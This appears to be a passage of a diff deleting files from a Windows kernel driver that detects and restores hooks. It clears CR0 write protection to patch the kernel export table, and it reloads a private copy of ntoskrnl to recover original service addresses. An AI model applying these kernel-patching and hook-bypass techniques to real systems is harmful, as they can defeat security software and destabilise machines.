opthdr = NtDllHeader->OptionalHeader;
pExportTable =(IMAGE_EXPORT_DIRECTORY*)((BYTE*)ulModuleBase + opthdr.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT]. VirtualAddress); //得到导出表
arrayOfFunctionAddresses = (DWORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfFunctions); //地址表
arrayOfFunctionNames = (DWORD*)((BYTE*)ulModuleBase + pExportTable->AddressOfNames); //函数名表
arrayOfFunctionOrdinals = (WORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfNameOrdinals);
Base = pExportTable->Base;
_asm
{
CLI
MOV EAX, CR0
AND EAX, NOT 10000H
MOV CR0, EAX
}
arrayOfFunctionAddresses[arrayOfFunctionOrdinals[x] + Base - 1] = ulFunctionOrdinal;
_asm
{
MOV EAX, CR0
OR EAX, 10000H
MOV CR0, EAX
STI
}
break;
}
}
return TRUE;
}
ULONG GetEatHook(ULONG ulOldAddress,int x,ULONG ulSystemKernelModuleBase,ULONG ulSystemKernelModuleSize)
{
ULONG ulModuleBase;
PIMAGE_DOS_HEADER pDosHeader;
PIMAGE_NT_HEADERS NtDllHeader;
IMAGE_OPTIONAL_HEADER opthdr;
DWORD* arrayOfFunctionAddresses;
DWORD* arrayOfFunctionNames;
WORD* arrayOfFunctionOrdinals;
DWORD functionOrdinal;
DWORD Base,functionAddress;
IMAGE_EXPORT_DIRECTORY *pExportTable;
char *functionName = NULL;
BOOL bIsEatHooked = FALSE;
ULONG position = 0;
ULONG ulFunctionOrdinal;
ulModuleBase = ulSystemKernelModuleBase;
pDosHeader = (PIMAGE_DOS_HEADER)ulModuleBase;
if (pDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
NtDllHeader=(PIMAGE_NT_HEADERS)(ULONG)((ULONG)pDosHeader+pDosHeader->e_lfanew);
if (NtDllHeader->Signature!=IMAGE_NT_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
opthdr = NtDllHeader->OptionalHeader;
pExportTable =(IMAGE_EXPORT_DIRECTORY*)((BYTE*)ulModuleBase + opthdr.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT]. VirtualAddress); //得到导出表
arrayOfFunctionAddresses = (DWORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfFunctions); //地址表
arrayOfFunctionNames = (DWORD*)((BYTE*)ulModuleBase + pExportTable->AddressOfNames); //函数名表
arrayOfFunctionOrdinals = (WORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfNameOrdinals);
Base = pExportTable->Base;
functionName = (char*)((BYTE*)ulModuleBase + arrayOfFunctionNames[x]);
ulFunctionOrdinal = arrayOfFunctionOrdinals[x] + Base - 1;
functionAddress = (DWORD)((BYTE*)ulModuleBase + arrayOfFunctionAddresses[ulFunctionOrdinal]);
if (*functionName == 'Z' &&
*(functionName+1) == 'w')
{
position = *((WORD*)(functionAddress + 1)); //得到服务号
if (position > 0 &&
position <= OriginalServiceDescriptorTable->TableSize)
{
//得到原始地址
functionAddress = OriginalServiceDescriptorTable->ServiceTable[position] - (ULONG)ImageModuleBase + SystemKernelModuleBase;
}
}
if (ulOldAddress != functionAddress)
{
KdPrint(("EAT HOOK %08x:%s\r\n",functionAddress,functionName));
return functionAddress;
}
return 0;
}


@ -1,11 +0,0 @@
#include "DriverEntry.h"
BOOLEAN KernelHookCheck(PINLINEHOOKINFO InlineHookInfo);
VOID FillInlineHookInfo(PUCHAR ulTemp,PINLINEHOOKINFO InlineHookInfo,CHAR* szFunctionName,ULONG ulOldAddress,ULONG HookType);
VOID CheckFuncByOpcode(PVOID ulReloadAddress,PINLINEHOOKINFO InlineHookInfo,CHAR* szFunctionName,PVOID ulOldAddress);
ULONG GetNextFunctionAddress(ULONG ulNtDllModuleBase,ULONG ulOldAddress,char *functionName,PINLINEHOOKINFO InlineHookInfo);
BOOLEAN ReSetEatHook(CHAR *lpszFunction,ULONG ulReloadKernelModule,ULONG ulKernelModule);
ULONG GetEatHook(ULONG ulOldAddress,int x,ULONG ulSystemKernelModuleBase,ULONG ulSystemKernelModuleSize);
BOOLEAN IsFunctionInExportTable(ULONG ulModuleBase,ULONG ulFunctionAddress);


@ -1,820 +0,0 @@
#include "KernelReload.h"
#include "FileSystem.h"
#include "FixRelocation.h"
/*ZwQuerySystemInformation大法 枚举模块信息 获得第一模块 Ntos..*/
BOOLEAN GetSystemKernelModuleInfo(WCHAR **SystemKernelModulePath,PDWORD SystemKernelModuleBase,PDWORD SystemKernelModuleSize)
{
NTSTATUS status;
ULONG ulSize,i;
PMODULES pModuleList;
char *lpszKernelName=NULL;
ANSI_STRING AnsiKernelModule;
UNICODE_STRING UnicodeKernelModule;
BOOLEAN bRet=TRUE;
__try
{
status=ZwQuerySystemInformation(
SystemModuleInformation,
NULL,
0,
&ulSize
);
if (status != STATUS_INFO_LENGTH_MISMATCH)
{
return FALSE;
}
pModuleList=(PMODULES)ExAllocatePool(NonPagedPool,ulSize);
if (pModuleList)
{
status=ZwQuerySystemInformation(
SystemModuleInformation,
pModuleList,
ulSize,
&ulSize
);
if (!NT_SUCCESS(status))
{
bRet = FALSE;
}
}
if (!bRet)
{
if (pModuleList)
ExFreePool(pModuleList);
return FALSE;
}
*SystemKernelModulePath=ExAllocatePool(NonPagedPool,260*2);
if (*SystemKernelModulePath==NULL)
{
*SystemKernelModuleBase=0;
*SystemKernelModuleSize=0;
return FALSE;
}
lpszKernelName = pModuleList->smi[0].ModuleNameOffset+pModuleList->smi[0].ImageName; //第一模块名称
RtlInitAnsiString(&AnsiKernelModule,lpszKernelName);
RtlAnsiStringToUnicodeString(&UnicodeKernelModule,&AnsiKernelModule,TRUE);
RtlZeroMemory(*SystemKernelModulePath,260*2);
wcscat(*SystemKernelModulePath,L"\\SystemRoot\\system32\\");
memcpy(
*SystemKernelModulePath+wcslen(L"\\SystemRoot\\system32\\"), //第一模块路径
UnicodeKernelModule.Buffer,
UnicodeKernelModule.Length
);
*SystemKernelModuleBase=(DWORD)pModuleList->smi[0].Base; //获得第一模块地址
*SystemKernelModuleSize=(DWORD)pModuleList->smi[0].Size; //获得第一模块大小
ExFreePool(pModuleList);
RtlFreeUnicodeString(&UnicodeKernelModule);
}__except(EXCEPTION_EXECUTE_HANDLER){
}
return TRUE;
}
/*获得文件对象中DeviceObject和RealDevice*/
BOOLEAN IoGetFileSystemVpbInfo(IN PFILE_OBJECT FileObject,PDEVICE_OBJECT *DeviceObject,PDEVICE_OBJECT *RealDevice)
{
//PDEVICE_OBJECT deviceObject;
// If the file object has a mounted Vpb, use its DeviceObject.
if(FileObject->Vpb != NULL && FileObject->Vpb->DeviceObject != NULL)
{
*DeviceObject = FileObject->Vpb->DeviceObject;
*RealDevice= FileObject->Vpb->RealDevice;
// Otherwise, if the real device has a VPB that indicates that it is mounted,
// then use the file system device object associated with the VPB.
}
else if
(
!(FileObject->Flags & FO_DIRECT_DEVICE_OPEN)
&&
FileObject->DeviceObject->Vpb != NULL
&&
FileObject->DeviceObject->Vpb->DeviceObject != NULL
)
{
*DeviceObject = FileObject->DeviceObject->Vpb->DeviceObject;
*RealDevice = FileObject->DeviceObject->Vpb->RealDevice;
// Otherwise, just return the real device object.
}
else
{
*DeviceObject = FileObject->DeviceObject;
*RealDevice=NULL;
}
if (*RealDevice==NULL||*DeviceObject==NULL)
{
return FALSE;
}
// Simply return the resultant file object.
return TRUE;
}
//获得FileObject中的RealDevice和DeviceObject
BOOLEAN GetDeviceObjectFromFileFullName(WCHAR *FileFullName,PDEVICE_OBJECT *RealDevice, PDEVICE_OBJECT *DeviceObject)
{
WCHAR wRootName[32]={0};
UNICODE_STRING RootName;
OBJECT_ATTRIBUTES ObjectAttributes={0};
NTSTATUS status;
HANDLE hFile;
IO_STATUS_BLOCK IoStatus;
PFILE_OBJECT FileObject;
if (FileFullName[0]==0x005C)
{//in \Windows\system32\ntkrnlpa.exe
wcscpy(wRootName,L"\\SystemRoot");
}
else
{
wcscpy(wRootName,L"\\DosDevices\\*:\\");
wRootName[12]=FileFullName[0];
}
RtlInitUnicodeString(&RootName,wRootName);
InitializeObjectAttributes(&ObjectAttributes, &RootName,
OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE, NULL, NULL);
//RootName.Buffer = "\SystemRoot"
status = IoCreateFile(
&hFile,
SYNCHRONIZE,
&ObjectAttributes,
&IoStatus,
0,
FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ|FILE_SHARE_WRITE,
FILE_OPEN,
FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0,
0,
NULL,
IO_NO_PARAMETER_CHECKING);
if (!NT_SUCCESS(status))
{
return FALSE;
}
status=ObReferenceObjectByHandle(hFile,1,*IoFileObjectType,KernelMode,&FileObject,NULL);
if (!NT_SUCCESS(status))
{
ZwClose(hFile);
return FALSE;
}
if(!IoGetFileSystemVpbInfo(FileObject,DeviceObject,RealDevice)) //获得FileObject中的deviceObject和RealDevice
{
ObfDereferenceObject(FileObject);
ZwClose(hFile);
return FALSE;
}
ObfDereferenceObject(FileObject);
ZwClose(hFile);
return TRUE;
}
/*获得系统目录*/
BOOLEAN GetWindowsRootName(WCHAR *WindowsRootName)
{
UNICODE_STRING RootName,ObjectName;
OBJECT_ATTRIBUTES ObjectAttributes;
HANDLE hLink;
NTSTATUS status;
WCHAR *SystemRootName=(WCHAR*)0x7FFE0030;
WCHAR *ObjectNameBuffer=(WCHAR*)ExAllocatePool(NonPagedPool,260*2);
if (ObjectNameBuffer==NULL)
{
return FALSE;
}
RtlZeroMemory(ObjectNameBuffer,260*2);
RtlInitUnicodeString(&RootName,L"\\SystemRoot");
InitializeObjectAttributes(&ObjectAttributes,&RootName,OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE, NULL, NULL);
status=ZwOpenSymbolicLinkObject(&hLink,1,&ObjectAttributes);
if (NT_SUCCESS(status))
{
ObjectName.Buffer=ObjectNameBuffer;
ObjectName.Length=0;
ObjectName.MaximumLength=260*2;
status=ZwQuerySymbolicLinkObject(hLink,&ObjectName,NULL);
//ObjectNameBuffer \Device\Harddisk0\Partition1\Windows
if (NT_SUCCESS(status))
{
int ObjectNameLength=ObjectName.Length/2;
int Index;
for (Index=ObjectNameLength-1;Index>0;Index--)
{
if (ObjectNameBuffer[Index]==0x005C)
{
if (!MmIsAddressValid(&WindowsRootName[ObjectNameLength-Index]))
{
break;
}
//\Windows WindowsRootName
RtlCopyMemory(WindowsRootName,&ObjectNameBuffer[Index],(ObjectNameLength-Index)*2);
ExFreePool(ObjectNameBuffer);
return TRUE;
}
}
}
}
ExFreePool(ObjectNameBuffer);
if (!MmIsAddressValid(SystemRootName))
{
return FALSE;
}
if (SystemRootName[1]!=0x003A||SystemRootName[2]!=0x005C)
{
return FALSE;
}
wcscpy(WindowsRootName,&SystemRootName[2]);
return TRUE;
}
/*
FileObject->IrpList
*/
//\SystemRoot\system32\ntkrnlpa.exe
NTSTATUS KernelOpenFile(wchar_t *FileFullName,
PHANDLE FileHandle,
ACCESS_MASK DesiredAccess,
ULONG FileAttributes,
ULONG ShareAccess,
ULONG CreateDisposition,
ULONG CreateOptions)
{
WCHAR SystemRootName[32]=L"\\SystemRoot";
WCHAR *FileNodeName=NULL;
UNICODE_STRING FilePath;
PDEVICE_OBJECT RealDevice,DeviceObject;
NTSTATUS status=STATUS_UNSUCCESSFUL;
PFILE_OBJECT FileObject;
FileNodeName=ExAllocatePool(NonPagedPool,260*2);
if (FileNodeName==NULL)
{
return status;
}
RtlZeroMemory(FileNodeName,260*2);
if (_wcsnicmp(FileFullName,SystemRootName,wcslen(SystemRootName))==0) //忘记相等返回什么了 不过应该是不完整路径 这里面是修复
{
//in
int Len;
if(!GetWindowsRootName(FileNodeName)) // \Windows
{
ExFreePool(FileNodeName);
return status;
}
Len=wcslen(SystemRootName);
wcscat(FileNodeName,&FileFullName[Len]);
//FileNodeName == \Windows\system32\ntkrnlpa.exe
//FileFullName == \SystemRoot\system32\ntkrnlpa.exe
}
else
{
if (FileFullName[1]!=0x003A||FileFullName[2]!=0x005C)
{
return status;
}
wcscpy(FileNodeName,&FileFullName[2]);
}
if(!GetDeviceObjectFromFileFullName(FileFullName,&RealDevice,&DeviceObject)) //获得FileObject中的DeviceObject和RealDevice
{
ExFreePool(FileNodeName);
return status;
}
//FileNodeName == \Windows\system32\ntkrnlpa.exe
RtlInitUnicodeString(&FilePath,FileNodeName);
status=IrpCreateFile(&FilePath,DesiredAccess,FileAttributes,ShareAccess,CreateDisposition,CreateOptions,DeviceObject,RealDevice,&FileObject);
//创建文件对象 挂入FileObject->IrpList中
if (!NT_SUCCESS(status))
{
ExFreePool(FileNodeName);
return status;
}
//根据文件对象,获得文件句柄
status=ObOpenObjectByPointer(
FileObject,
OBJ_KERNEL_HANDLE, //verifier下测试要指定OBJ_KERNEL_HANDLE
0,
DesiredAccess|0x100000,
*IoFileObjectType,
0,
FileHandle);
ObfDereferenceObject(FileObject);
return status;
}
//查询irp信息返回filesize
NTSTATUS KernelGetFileSize(HANDLE hFile, PLARGE_INTEGER FileSize)
{
NTSTATUS status;
PFILE_OBJECT FileObject;
PDEVICE_OBJECT DeviceObject,RealDevice;
FILE_STANDARD_INFORMATION FileInformation;
status=ObReferenceObjectByHandle(hFile, 0, *IoFileObjectType, KernelMode, &FileObject, 0);
if (!NT_SUCCESS(status))
{
return status;
}
if(!IoGetFileSystemVpbInfo(FileObject,&DeviceObject,&RealDevice))
{
ObDereferenceObject(FileObject);
return STATUS_UNSUCCESSFUL;
}
//查询irp堆栈信息传入FileObject
status=IrpQueryInformationFile(FileObject,DeviceObject,&FileInformation,sizeof(FILE_STANDARD_INFORMATION),FileStandardInformation);
if (!NT_SUCCESS(status))
{
ObDereferenceObject(FileObject);
return status;
}
FileSize->HighPart=FileInformation.EndOfFile.HighPart;
FileSize->LowPart=FileInformation.EndOfFile.LowPart;
ObDereferenceObject(FileObject);
return status;
}
/*
*/
NTSTATUS KernelReadFile(HANDLE hFile, PLARGE_INTEGER ByteOffset, ULONG Length, PVOID FileBuffer, PIO_STATUS_BLOCK IoStatusBlock)
{
NTSTATUS status;
PFILE_OBJECT FileObject;
PDEVICE_OBJECT DeviceObject,RealDevice;
FILE_STANDARD_INFORMATION FileInformation;
status=ObReferenceObjectByHandle(hFile, 0, *IoFileObjectType, KernelMode, &FileObject, 0);
if (!NT_SUCCESS(status))
{
return status;
}
if(!IoGetFileSystemVpbInfo(FileObject,&DeviceObject,&RealDevice))
{
ObDereferenceObject(FileObject);
return STATUS_UNSUCCESSFUL;
}
status=IrpReadFile(FileObject,DeviceObject,IoStatusBlock,FileBuffer,Length,ByteOffset); //Irp请求将文件读入缓冲区中
ObDereferenceObject(FileObject);
return status;
}
/*
FileBuffer中的偏移 VirtualAglin
filebuffer ImageModuleBase为系统中的模块地址
*/
BOOLEAN ImageFile(BYTE *FileBuffer,BYTE **ImageModuleBase)
{
PIMAGE_DOS_HEADER ImageDosHeader;
PIMAGE_NT_HEADERS ImageNtHeaders;
PIMAGE_SECTION_HEADER ImageSectionHeader;
DWORD FileAlignment,SectionAlignment,NumberOfSections,SizeOfImage,SizeOfHeaders;
DWORD Index;
BYTE *ImageBase;
DWORD SizeOfNtHeaders;
ImageDosHeader=(PIMAGE_DOS_HEADER)FileBuffer;
if (ImageDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
return FALSE;
}
ImageNtHeaders=(PIMAGE_NT_HEADERS)(FileBuffer+ImageDosHeader->e_lfanew);
if (ImageNtHeaders->Signature!=IMAGE_NT_SIGNATURE)
{
return FALSE;
}
FileAlignment=ImageNtHeaders->OptionalHeader.FileAlignment;//0x200
SectionAlignment=ImageNtHeaders->OptionalHeader.SectionAlignment;//0x1000
NumberOfSections=ImageNtHeaders->FileHeader.NumberOfSections;//0x16
SizeOfImage=ImageNtHeaders->OptionalHeader.SizeOfImage;//0x412000
SizeOfHeaders=ImageNtHeaders->OptionalHeader.SizeOfHeaders;//0x800
SizeOfImage=AlignSize(SizeOfImage,SectionAlignment);//0x412000
ImageBase=ExAllocatePool(NonPagedPool,SizeOfImage);
if (ImageBase==NULL)
{
return FALSE;
}
RtlZeroMemory(ImageBase,SizeOfImage);
//0xf8
SizeOfNtHeaders=sizeof(ImageNtHeaders->FileHeader) + sizeof(ImageNtHeaders->Signature)+ImageNtHeaders->FileHeader.SizeOfOptionalHeader;
ImageSectionHeader=(PIMAGE_SECTION_HEADER)((DWORD)ImageNtHeaders+SizeOfNtHeaders);
for (Index=0;Index<NumberOfSections;Index++)
{
ImageSectionHeader[Index].SizeOfRawData=AlignSize(ImageSectionHeader[Index].SizeOfRawData,FileAlignment);
ImageSectionHeader[Index].Misc.VirtualSize=AlignSize(ImageSectionHeader[Index].Misc.VirtualSize,SectionAlignment);
}
if (ImageSectionHeader[NumberOfSections-1].VirtualAddress+ImageSectionHeader[NumberOfSections-1].SizeOfRawData>SizeOfImage)
{//no in
ImageSectionHeader[NumberOfSections-1].SizeOfRawData = SizeOfImage-ImageSectionHeader[NumberOfSections-1].VirtualAddress;
}
RtlCopyMemory(ImageBase,FileBuffer,SizeOfHeaders);
for (Index=0;Index<NumberOfSections;Index++)
{
DWORD FileOffset=ImageSectionHeader[Index].PointerToRawData;
DWORD Length=ImageSectionHeader[Index].SizeOfRawData;
DWORD ImageOffset=ImageSectionHeader[Index].VirtualAddress;
RtlCopyMemory(&ImageBase[ImageOffset],&FileBuffer[FileOffset],Length);
}
*ImageModuleBase=ImageBase;
return TRUE;
}
ULONG AlignSize(ULONG nSize, ULONG nAlign)
{
return ((nSize + nAlign - 1) / nAlign * nAlign);
}
/*
DriverObject->DriverSection
*/
PVOID GetKernelModuleBase(PDRIVER_OBJECT DriverObject,char *KernelModuleName)
{
PLDR_DATA_TABLE_ENTRY DriverSection,LdrEntry;
ANSI_STRING AnsiKernelModuleName;
UNICODE_STRING UniKernelModuleName;
UNICODE_STRING ModuleName;
WCHAR *Buffer;
int Lentgh,Index;
RtlInitAnsiString(&AnsiKernelModuleName,KernelModuleName);
RtlAnsiStringToUnicodeString(&UniKernelModuleName,&AnsiKernelModuleName,TRUE);
Buffer=ExAllocatePool(NonPagedPool,260*2);
if (Buffer==NULL)
{
return NULL;
}
RtlZeroMemory(Buffer,206*2);
DriverSection=DriverObject->DriverSection;
LdrEntry=(PLDR_DATA_TABLE_ENTRY)DriverSection->InLoadOrderLinks.Flink;
while (LdrEntry&&DriverSection!=LdrEntry)
{
//(DWORD)LdrEntry->DllBase>=*(DWORD*)MmSystemRangeStart&&
if (LdrEntry->FullDllName.Length>0&&
LdrEntry->FullDllName.Buffer!=NULL)
{
if (MmIsAddressValid(&LdrEntry->FullDllName.Buffer[LdrEntry->FullDllName.Length/2-1]))
{
Lentgh=LdrEntry->FullDllName.Length/2;
for (Index=Lentgh-1;Index>0;Index--)
{
if (LdrEntry->FullDllName.Buffer[Index]==0x005C)
{
break;
}
}
if (LdrEntry->FullDllName.Buffer[Index]==0x005C)
{
RtlCopyMemory(Buffer,&(LdrEntry->FullDllName.Buffer[Index+1]),(Lentgh-Index-1)*2);
ModuleName.Buffer=Buffer;
ModuleName.Length=(Lentgh-Index-1)*2;
ModuleName.MaximumLength=260*2;
}
else
{
RtlCopyMemory(Buffer,LdrEntry->FullDllName.Buffer,Lentgh*2);
ModuleName.Buffer=Buffer;
ModuleName.Length=Lentgh*2;
ModuleName.MaximumLength=260*2;
}
if (RtlEqualUnicodeString(&ModuleName,&UniKernelModuleName,TRUE))
{
ExFreePool(Buffer);
return LdrEntry->DllBase;
}
}
}
LdrEntry=(PLDR_DATA_TABLE_ENTRY)LdrEntry->InLoadOrderLinks.Flink;
}
ExFreePool(Buffer);
return NULL;
}
/*
*/
PVOID
MiFindExportedRoutine (
IN PVOID DllBase,
BOOLEAN ByName,
IN char *RoutineName,
DWORD Ordinal
)
{
USHORT OrdinalNumber;
PULONG NameTableBase;
PUSHORT NameOrdinalTableBase;
PULONG AddressTableBase;
PULONG Addr;
LONG High;
LONG Low;
LONG Middle;
LONG Result;
ULONG ExportSize;
PVOID FunctionAddress;
PIMAGE_EXPORT_DIRECTORY ExportDirectory;
PAGED_CODE();
//获得导出表
ExportDirectory = (PIMAGE_EXPORT_DIRECTORY) RtlImageDirectoryEntryToData (
DllBase,
TRUE,
IMAGE_DIRECTORY_ENTRY_EXPORT,
&ExportSize);
if (ExportDirectory == NULL) {
return NULL;
}
NameTableBase = (PULONG)((PCHAR)DllBase + (ULONG)ExportDirectory->AddressOfNames);
NameOrdinalTableBase = (PUSHORT)((PCHAR)DllBase + (ULONG)ExportDirectory->AddressOfNameOrdinals);
AddressTableBase=(PULONG)((PCHAR)DllBase + (ULONG)ExportDirectory->AddressOfFunctions);
if (!ByName)
{
return (PVOID)AddressTableBase[Ordinal];
}
Low = 0;
Middle = 0;
High = ExportDirectory->NumberOfNames - 1;
while (High >= Low) {
Middle = (Low + High) >> 1;
Result = strcmp (RoutineName,
(PCHAR)DllBase + NameTableBase[Middle]);
if (Result < 0) {
High = Middle - 1;
}
else if (Result > 0) {
Low = Middle + 1;
}
else {
break;
}
}
if (High < Low) {
return NULL;
}
OrdinalNumber = NameOrdinalTableBase[Middle];
if ((ULONG)OrdinalNumber >= ExportDirectory->NumberOfFunctions) {
return NULL;
}
Addr = (PULONG)((PCHAR)DllBase + (ULONG)ExportDirectory->AddressOfFunctions);
FunctionAddress = (PVOID)((PCHAR)DllBase + Addr[OrdinalNumber]);
//
// Forwarders are not used by the kernel and HAL to each other.
//
ASSERT ((FunctionAddress <= (PVOID)ExportDirectory) ||
(FunctionAddress >= (PVOID)((PCHAR)ExportDirectory + ExportSize)));
return FunctionAddress;
}
BOOLEAN InsertOriginalFirstThunk(DWORD ImageBase,DWORD ExistImageBase,PIMAGE_THUNK_DATA FirstThunk)
{
DWORD Offset;
PIMAGE_THUNK_DATA OriginalFirstThunk;
Offset=(DWORD)FirstThunk-ImageBase;
OriginalFirstThunk=(PIMAGE_THUNK_DATA)(ExistImageBase+Offset);
while (OriginalFirstThunk->u1.Function)
{
FirstThunk->u1.Function=OriginalFirstThunk->u1.Function;
OriginalFirstThunk++;
FirstThunk++;
}
return TRUE;
}
//修复导入表
BOOLEAN FixImportTable(BYTE *ImageBase,DWORD ExistImageBase,PDRIVER_OBJECT DriverObject)
{
PIMAGE_IMPORT_DESCRIPTOR ImageImportDescriptor=NULL;
PIMAGE_THUNK_DATA ImageThunkData,FirstThunk;
PIMAGE_IMPORT_BY_NAME ImortByName;
DWORD ImportSize;
PVOID ModuleBase;
char ModuleName[260];
DWORD FunctionAddress;
//得到导入表地址
ImageImportDescriptor=(PIMAGE_IMPORT_DESCRIPTOR)RtlImageDirectoryEntryToData(ImageBase,TRUE,IMAGE_DIRECTORY_ENTRY_IMPORT,&ImportSize);
if (ImageImportDescriptor==NULL)
{
return FALSE;
}
while (ImageImportDescriptor->OriginalFirstThunk&&ImageImportDescriptor->Name)
{
strcpy(ModuleName,(char*)(ImageBase+ImageImportDescriptor->Name)); //导入信息名称
//ntoskrnl.exe(NTKRNLPA.exe、ntkrnlmp.exe、ntkrpamp.exe)
if (_stricmp(ModuleName,"ntkrnlpa.exe")==0||
_stricmp(ModuleName,"ntoskrnl.exe")==0||
_stricmp(ModuleName,"ntkrnlmp.exe")==0||
_stricmp(ModuleName,"ntkrpamp.exe")==0)
{//no in
ModuleBase=GetKernelModuleBase(DriverObject,"ntkrnlpa.exe"); //通过DriverObject->DriverSection 遍历内核模块
if (ModuleBase==NULL)
{
ModuleBase=GetKernelModuleBase(DriverObject,"ntoskrnl.exe");
if (ModuleBase==NULL)
{
ModuleBase=GetKernelModuleBase(DriverObject,"ntkrnlmp.exe");
if (ModuleBase==NULL)
{
ModuleBase=GetKernelModuleBase(DriverObject,"ntkrpamp.exe");
}
}
}
}
else
{
ModuleBase=GetKernelModuleBase(DriverObject,ModuleName);
}
if (ModuleBase==NULL)
{
FirstThunk=(PIMAGE_THUNK_DATA)(ImageBase+ImageImportDescriptor->FirstThunk);
InsertOriginalFirstThunk((DWORD)ImageBase,ExistImageBase,FirstThunk);
ImageImportDescriptor++;
continue;
}
//PSHED.dll
ImageThunkData=(PIMAGE_THUNK_DATA)(ImageBase+ImageImportDescriptor->OriginalFirstThunk);
FirstThunk=(PIMAGE_THUNK_DATA)(ImageBase+ImageImportDescriptor->FirstThunk);
while(ImageThunkData->u1.Ordinal)
{
//序号导入
if(IMAGE_SNAP_BY_ORDINAL32(ImageThunkData->u1.Ordinal))
{
//通过系统内核的导出表 名称- 获得 函数地址
FunctionAddress=(DWORD)MiFindExportedRoutine(ModuleBase,FALSE,NULL,ImageThunkData->u1.Ordinal & ~IMAGE_ORDINAL_FLAG32);
if (FunctionAddress==0)
{
return FALSE;
}
FirstThunk->u1.Function=FunctionAddress;
}
//函数名导入
else
{
//
ImortByName=(PIMAGE_IMPORT_BY_NAME)(ImageBase+ImageThunkData->u1.AddressOfData);
FunctionAddress=(DWORD)MiFindExportedRoutine(ModuleBase,TRUE,ImortByName->Name,0);
if (FunctionAddress==0)
{
return FALSE;
}
FirstThunk->u1.Function=FunctionAddress;
}
FirstThunk++;
ImageThunkData++;
}
ImageImportDescriptor++;
}
return TRUE;
}
/*
system32//NtosKrnl.exe ..
*/
BOOLEAN PeLoad(
WCHAR *FileFullPath,
BYTE **ImageModeleBase,
PDRIVER_OBJECT DeviceObject,
DWORD ExistImageBase
)
{
NTSTATUS Status;
HANDLE hFile;
LARGE_INTEGER FileSize;
DWORD Length;
BYTE *FileBuffer;
BYTE *ImageBase;
IO_STATUS_BLOCK IoStatus;
//\SystemRoot\system32\ntkrnlpa.exe
Status=KernelOpenFile(FileFullPath,&hFile,0x100020,0x80,1,1,0x20); //自己创建文件对象挂入FileObject->IrpList 并返回文件句柄
if (!NT_SUCCESS(Status))
{
return FALSE;
}
Status=KernelGetFileSize(hFile,&FileSize); //读取irp信息返回filesize
if (!NT_SUCCESS(Status))
{
ZwClose(hFile);
return FALSE;
}
Length=FileSize.LowPart;
FileBuffer=ExAllocatePool(PagedPool,Length);
if (FileBuffer==NULL)
{
ZwClose(hFile);
return FALSE;
}
Status=KernelReadFile(hFile,NULL,Length,FileBuffer,&IoStatus); //传入文件句柄、文件大小 通过irp请求读取文件到内存中
if (!NT_SUCCESS(Status))
{
ZwClose(hFile);
ExFreePool(FileBuffer);
return FALSE;
}
ZwClose(hFile);
if(!ImageFile(FileBuffer,&ImageBase)) //修复FileBuffer中的偏移 按照VirtualAglin 对齐 得到全局ImageModuleBase
{
ExFreePool(FileBuffer);
return FALSE;
}
ExFreePool(FileBuffer);
//2k3下MiFindExportedRoutine调用失败
if(!FixImportTable(ImageBase,ExistImageBase,DeviceObject)) //修复导入表
{
ExFreePool(ImageBase);
return FALSE;
}
if(!FixBaseRelocTable(ImageBase,ExistImageBase)) //修复重定位表
{
ExFreePool(ImageBase);
return FALSE;
}
*ImageModeleBase=ImageBase; //得到最后的基地址 就是 和 原来内存中格式一样的 一块ntos
return TRUE;
}


@ -1,64 +0,0 @@
#include "Reload.h"
BOOLEAN GetSystemKernelModuleInfo(WCHAR **SystemKernelModulePath,PDWORD SystemKernelModuleBase,PDWORD SystemKernelModuleSize);
BOOLEAN IoGetFileSystemVpbInfo(IN PFILE_OBJECT FileObject,PDEVICE_OBJECT *DeviceObject,PDEVICE_OBJECT *RealDevice);
BOOLEAN GetDeviceObjectFromFileFullName(WCHAR *FileFullName,PDEVICE_OBJECT *RealDevice, PDEVICE_OBJECT *DeviceObject);
BOOLEAN GetWindowsRootName(WCHAR *WindowsRootName);
NTSTATUS KernelOpenFile(wchar_t *FileFullName,
PHANDLE FileHandle,
ACCESS_MASK DesiredAccess,
ULONG FileAttributes,
ULONG ShareAccess,
ULONG CreateDisposition,
ULONG CreateOptions);
NTSTATUS KernelGetFileSize(HANDLE hFile, PLARGE_INTEGER FileSize);
NTSTATUS KernelReadFile(HANDLE hFile, PLARGE_INTEGER ByteOffset, ULONG Length, PVOID FileBuffer, PIO_STATUS_BLOCK IoStatusBlock);
BOOLEAN ImageFile(BYTE *FileBuffer,BYTE **ImageModuleBase);
ULONG AlignSize(ULONG nSize, ULONG nAlign);
PVOID GetKernelModuleBase(PDRIVER_OBJECT DriverObject,char *KernelModuleName);
BOOLEAN InsertOriginalFirstThunk(DWORD ImageBase,DWORD ExistImageBase,PIMAGE_THUNK_DATA FirstThunk);
PVOID
MiFindExportedRoutine (
IN PVOID DllBase,
BOOLEAN ByName,
IN char *RoutineName,
DWORD Ordinal
);
BOOLEAN FixImportTable(BYTE *ImageBase,DWORD ExistImageBase,PDRIVER_OBJECT DriverObject);
BOOLEAN PeLoad(
WCHAR *FileFullPath,
BYTE **ImageModeleBase,
PDRIVER_OBJECT DeviceObject,
DWORD ExistImageBase
);


@ -1,355 +0,0 @@
#include "Reload.h"
#include "KernelReload.h"
WCHAR* SystemKernelFilePath = NULL;
ULONG_PTR SystemKernelModuleBase = 0;
ULONG_PTR SystemKernelModuleSize = 0;
ULONG_PTR ImageModuleBase;
PVOID OriginalKiServiceTable;
extern PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable;
PSERVICE_DESCRIPTOR_TABLE OriginalServiceDescriptorTable;
PSERVICE_DESCRIPTOR_TABLE Safe_ServiceDescriptorTable;
/*
FuncName Ntos地址 Ntos地址
//第一次都是通过 系统的原来偏移 + NewBase 获得函数地址
//然后通过自己的RMmGetSystemRoutineAddress获得 偏移+NewBase 获得函数地址
*/
